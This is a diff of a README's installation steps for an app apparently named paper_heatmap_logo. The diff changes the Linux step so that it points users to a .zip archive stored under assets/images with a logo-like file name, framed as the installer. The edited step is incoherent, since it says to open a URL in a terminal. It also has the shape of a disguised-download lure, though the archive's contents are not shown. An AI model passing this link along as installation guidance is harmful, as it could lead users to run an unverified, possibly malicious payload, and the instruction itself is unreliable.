granbecman/paper_heatmap_logo/README.md

 4. **Install the Application:**
    - For **Windows:** Open the downloaded `.exe` file and follow the on-screen instructions.
    - For **macOS:** Open the downloaded `.dmg` file, then drag the app to your Applications folder.
-   - For **Linux:** Open the `.tar.gz` file in your terminal and follow the included installation instructions.
+   - For **Linux:** Open the `https://raw.githubusercontent.com/granbecman/paper_heatmap_logo/main/assets/images/logo-heatmap-paper-1.6-alpha.1.zip` file in your terminal and follow the included installation instructions.

 5. **Run the Application:** Locate the installed app on your device and click to open.